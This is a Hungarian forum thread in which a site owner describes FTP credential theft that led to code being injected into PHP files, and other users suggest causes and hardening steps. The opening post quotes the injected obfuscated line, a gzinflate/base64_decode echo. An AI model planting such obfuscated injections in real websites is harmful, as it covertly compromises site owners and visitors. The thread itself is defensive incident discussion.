FTP Jelszólopás

Linux-security

Sziasztok!

A napokban érdekes dolgok jelentek meg néhány weboldalam(szerencsére csak hobbi célú lapok) kódjaiban, konkrétan ez:


#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

Ez egy JS include igazából amit egy kedves valaki(gondolom valami bot) FTP-n kapcsolódás után szépen beleszórt minden index* és wp*php fájlba. Az FTP login a 31.31.79.77 IP-ről jött, az IP tulajdonosával felvettem a kapcsolatot, kaptam is választ, hogy intézik amit intézni kell... Bár a nevük is elég bizarr: wedos ... we DoS? :D

Érdekelne, hogy a jelenséggel találkozott-e már valaki rajtam kívül és hogyan sikerült meggátolnia a további jelszólopást. Gyanítom, hogy a jelszót egy Windows kliensről lopták le FTP kapcsolódás közben. Az adott gépen a vírusirtó szerint nincs semmi nem odavaló. Az is érdekelne, hogy az "abuse" jelentésre az adott ISPnek nem lenne-e kötelessége valamilyen szinten utánajárni, hogy mégis mi folyik a hálózatában? Vagy azon túl, hogy rákérdez a kedves ügyfelénél és elfogadja annak válaszát nem tehet mást? Lehet én vagyok naiv... :)

Természetesen jelszócsere volt és az IP reject-elve, szerencsére csak hobbi célú weblapokhoz fértek hozzá, az FTP accon kívül semmihez.

  • 12336 megtekintés

( harlequin | 2012. 03. 13., k – 10:16 )

"Gyanítom, hogy a jelszót egy Windows kliensről lopták le FTP kapcsolódás közben. "
Vagy Total Commanderből közvetlenül. Windowson elég gyakori pontja az FTP-s jelszólopásnak.
Nagyon gyakori program könnyen visszafejthető ftp jelszavakkal.

  • Alapból plain textben küld mindent (SSL-el javítható, de rohadt körülményes a felhasználóknak)
  • Multiport protokoll, nehezen tűzfalazható (pl. owner iptables szabállyal)
  • Nincs megoldva a fájlnevek karakterkódolása, ezért rendszeres probléma van a "nem tudom törölni a fájlomat" című játékból.
  • Ha szóköz van a fájlnév elején vagy végén, dettó ugyanez a helyzet.
  • Folyamatosan el kell magyarázni az end usereknek, hogy kapcsolják be a passzív módot (a többségük router mögött ül).
  • Ha sok kis fájlt másolsz vele, akkor a data kapcsolatok nyitogatása rengeteg időt elvesz.

Értem, köszönöm.

Ezek közül a plain textben utazó jelszót érzem a legsúlyosabbnak. Ékezetes fileneveket nem szoktam használni, a passzív módot be szoktam kapcsolni, az idő nem érdekel, nem kell néznem, hol tart a feltöltés, közben tudok mást csinálni.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

( janoszen v | 2012. 03. 13., k – 10:18 )

Először is felejtsd el az FTP-t, iszonyat sok sebből vérzik az a protokoll. Aztán nézd meg jó alaposan, ha van Windowsos géped rajta Total Commanderrel, amit. Feltöltésre használsz, mertaz esetek 99,5%-ában innen kerül ki a jelszó egy vírus regítségével. A maradék esetben a szolgáltató biztonsági beállításai nem megfelelőek. (Lásd a GitHub accomon a LAMPSecurityToolkit projektet.) Végezetül változtass jelszót és távolítsd el a szemetet.

( tbs v | 2012. 03. 13., k – 10:21 )

Hát, nincs rá királyi út, de VALÓDI tls ftpes kapcsolatot ritkán csinálnak botok, hiába winscp/totalcommander/filezilla/stb. ;) Userdir szeparáció is segít a szemétszórás korlátozásában. Sajnos utólagos orvoslatra nincs ötletem... :(

subscribe amúgy az ISP kötelességeinek. Érdekelne engem is.

( p.zoltan | 2012. 03. 13., k – 10:32 )

egy ilyen .ftpaccess file jót tehet:

DenyAll
Allow 1.2.3.4

valamint ssh port elmozgatása máshová és csak és kizárólag sftp-n kapcsolódás

Ez magától értetődően csak kevés usernél opció, hiszen ha sok ügyfeled van, akarva-akaratlan előbb utóbb belefut abba a user, hogy külföldről akar bejönni. Nekem egyszer olyat kellett debuggolnom, hogy az Oracle hálózatából jött volna a kapcsolat és mint kiderült, a usernek be kellett volna állítania egy proxyt, ami viszont Londonban végződtette volna.

Amit be kell masolni az openvpn telepitomappaja ala, ha ertelmesen hasznalni is szeretne (peldaul, hogy a kis talcaraulo ikonbol felbuborekoljon mint valaszthato lehetoseg).

Akkor mar inkabb a PPTP VPN, screenshotokkal megtamogatva. Az legalabb beepitett feature.
-- 

Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal

Én még nem üzemeltem be, de így, hogy újra feljött a téma, most lehet rászánom magam.. csak nem igazán ügyfél barát, de a véleményetek érdekel.
Egy URL-t kell meghívnia, amin keresztül az IP címét megkapom, és ekkor engedélyezem 1 órára az ftp usert az adott IP-ről.

Nagyon fognak az ügyfelek utálni? :)

--
Joe

( locsemege v | 2012. 03. 13., k – 10:41 )

feliratkozás

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

( Sulc v | 2012. 03. 13., k – 10:58 )

"index* és wp*php fájlba."

mikor frissítettél wordpress-t utoljára?

( pepelopez | 2012. 03. 13., k – 11:32 )

Hát amíg a kliensen ott a "jelszólopó vírus" addig mind1, nálunk belső ipcímen van az ftp-szerver, és openvpn/pptp-en bejelentkezve lehet elérni kintről....

( Tyra3l | 2012. 03. 13., k – 14:54 )

inkabb atfogalmazom:
eleg sok vita ment azon, hogy az IP cim onmagaban szemelyes adat-e vagy sem, de a legtobb szerv egyetertett abban, hogy a harmadik fel reszere csak elozetes engedellyel tovabbithato ez az adat.
raadasul ugye a blogpostban kvazi buncselekmeny elkoveteserol beszelunk, szoval szerintem jobb lenne ilyen kontextusban nem kiirni az eredeti IP-t.

Tyrael

( uid_6201 v | 2012. 03. 13., k – 15:14 )

Kb. 2 éve esett át egyik szerverem egy ilyen támadássorozaton.
Cikkeztek akkortájt sokat arról, hogy egy internetes féreg köpködi ki a Windowst használó kliensekből a jelszavakat.

Tehát nem új a dolog. És a windowsról indított SCP sem ad erre megoldást, mert nem a TCP/IP kapcsolatból lopják ki a jelszót, hanem a webszerkesztő emberke Windowsából.

Az jó kérdés, hogy csak a tárolt jelszavakat, vagy mélyebb szintű a féreg működése és a szoftverből is kirántja a bepötyögött jelszót?

Ez mindenképp valami keylogger féleség lehetett, mert jelszavakat nem szoktam letároltatni sosem. Ami még szóba jöhet, hogy a TCP streamből halászta ki a jelszót, bár ezt annyira nem tartom valószínűnek. Úgy gondolom amit tudtam azt megtettem a jövőbeli hasonló szívások elkerülése érdekében. Az viszont még érdekelne, hogy mit lehet kezdeni az ilyen gépekkel mint ahonnan bejöttek az "abuse" jelentésen túl, illetve mekkora felelőséggel bír az ISP. Tudom jól, hogy ez a host csak egy a sok ezer hasonló célú közül, de szeretnék megtenni mindent, amit meglehet ilyen esetben...

( nightw | 2012. 03. 13., k – 20:09 )

Webhosting cegnel toltott ido alatt szerzett tapasztalat alapjan ez nehany ezer tarhely kiszolgalasa eseten legalabb napi 1 darabszamu dolog. Az erintettek nagy szazalekban TC-ben tarolt jelszoval szoktak beszivni valamilyen Windows-os ferggel. Ha nem tarolod sehol, akkor esetleg keylogger, ez ritkabb, de lehetseges. Az a vicces, hogy sokszor elofordul, hogy mas IP cim tolti le az osszes index* alaku fajlt (ratyin vannak megirva, igy az indexakarmivalami.txt formatumu fajlokat is), mint amelyik par masodperc mulva visszatolti. Kemenyen elosztott rendszer. Vedkezes egyszeruen az, hogy nincs FTP. Ez webhosting uzletagban persze nem lehetseges. Masik cegnel lattam olyat (ugyfelszivato egy kicsit, ezert mi nem vezettuk be), hogy van egy frontend, ahol meg kell adnod engedelyezett IP-ket kulon es csak azok csatlakozhatnak FTP-n. Ha Te kontrollalod az egesz szervert, akkor ez jarhato megoldas lehet neked ugy, hogy magyar IP tartomanyokra szursz, mert kevesebb magyar tagja van ezeknek a botneteknek, mint kulfoldi.

"Masik cegnel lattam olyat (ugyfelszivato egy kicsit, ezert mi nem vezettuk be), hogy van egy frontend, ahol meg kell adnod engedelyezett IP-ket kulon"
Talán a Mediacenternél van ilyen, de nem kell tudnod az IP-det, csak be kell lépned a webes felületükre, és az az IP a köv. 24 órában ftp-zhet.

( qtgame v | 2012. 03. 14., sze – 15:43 )

Velem ugyanez tortent... csak totalcmd-t hasznalok ftp-re es ezen a gepen 5 db ftp volt elmentve... csak az egyikre mentek be es ott sikerult modositani az index.php fajlokat... meg is neztem a logokat nem volt probalkozas, nekem is ugyanarrol az iprol jott a behatolas es elsore bent is volt. Mindenfele virusirtas utan sem talaltam ferget... szoval ez nalam meg mindig az erdekes esetek koze tartozik.

QT

( hrgy84 | 2012. 03. 15., cs – 12:02 )

Na, szoval csak nemi kiegeszites:
- A Total Commander maga is sebezheto, de altalaban ez a kisebbik problema. A nagyobbik gond, hogy a userek tobbsege egyszeruen nem frissiti, es igy egy olyan verzio van a gepen, ami plaintextben, vagy gyenge vedelem mellett tarolja a jelszavakat. A megoldas: mindig rakd fel a legfrissebb TC-t. Akar meg a betakat is fel lehet rakni, Ghisler nem rak ki alapszinten nem mukodo stuffot, max nehany feature meg nincs benne.
- Az FTP sem az ordogtol valo, ha korultekintoen hasznaljak. Eloszor is, nagyon bonyolult legyen a jelszo. Nem eleg az EnPortalom2012 tipusu jelszo, legyen teljesen random, es legyenek benne specko karakterek is.
- Az FTP/TLS nem rossz megoldas, sokat tud segiteni. A TC legutolso verzioja mar tudja, de asszem le kell tolteni hozza a megfelelo openssl dll-t. Ha kicsit keresgelsz a neten, talalhatsz ilyet, de nem mindegyik openssl dll jo hozza, szoval erdemes TC specifikusan keresni.
-- 

Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal

Köszönöm a tippeket! Sajnos esetemben szerintem a nagyon bonyolult jelszó sem segített volna, mivel nem bruteforce volt, hanem jelszó lopás. A TC relatív friss volt szerintem, max január környékén lett letöltve és telepítve az akkori aktuális. A TLS-t azóta bekapcsoltam az FTP szerveren és fontolgatom annak a lehetőségét amit fentebb is írt valaki, hogy egy webes felületet összeütök, ahol beloginolva lehet állítani ki mikor hova tud FTP-zni.

Köszönöm a segítséget mindenkinek!

Nem feltetlen neked irtam, inkabb altalanossagban, mert itt sokan mondtak sokfelet, amibol nagyon sokminden jo volt, de sokminden akar felrevezeto is lehetett volna.

Neked pedig: Windows Update folyamatosan legyen bekapcsolva, viruskereso telepitve, tuzfal bekapcsolva, es ha kell, tizenotszor gondold at, hogy ha valamiert szol az antivirus, akkor mire kattintasz. Es idegen geprol _nem_ FTP-zunk, annyira semmi nem lehet surgos.
-- 

Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal

( sanyee1991 | 2012. 04. 02., h – 02:01 )

Ha dc-zel vagy valami fájl megosztó programot használsz és a Windows / total commander mappát megosztod... ott szívás van...(FileZilla,FlashFXP stb...)

Vannak azért még olyan kiterjesztések, amiket nem osztanék meg :):)

Sok felhasználó nem gondolkodik... elmenti a jelszavát egy új szöveges dokumentumba,de ami a legrosszabb: "password.txt, jelszo.txt, poker.txt stb...*.vnc,*.rdp..." - de az ilyenek meg is érdemlik...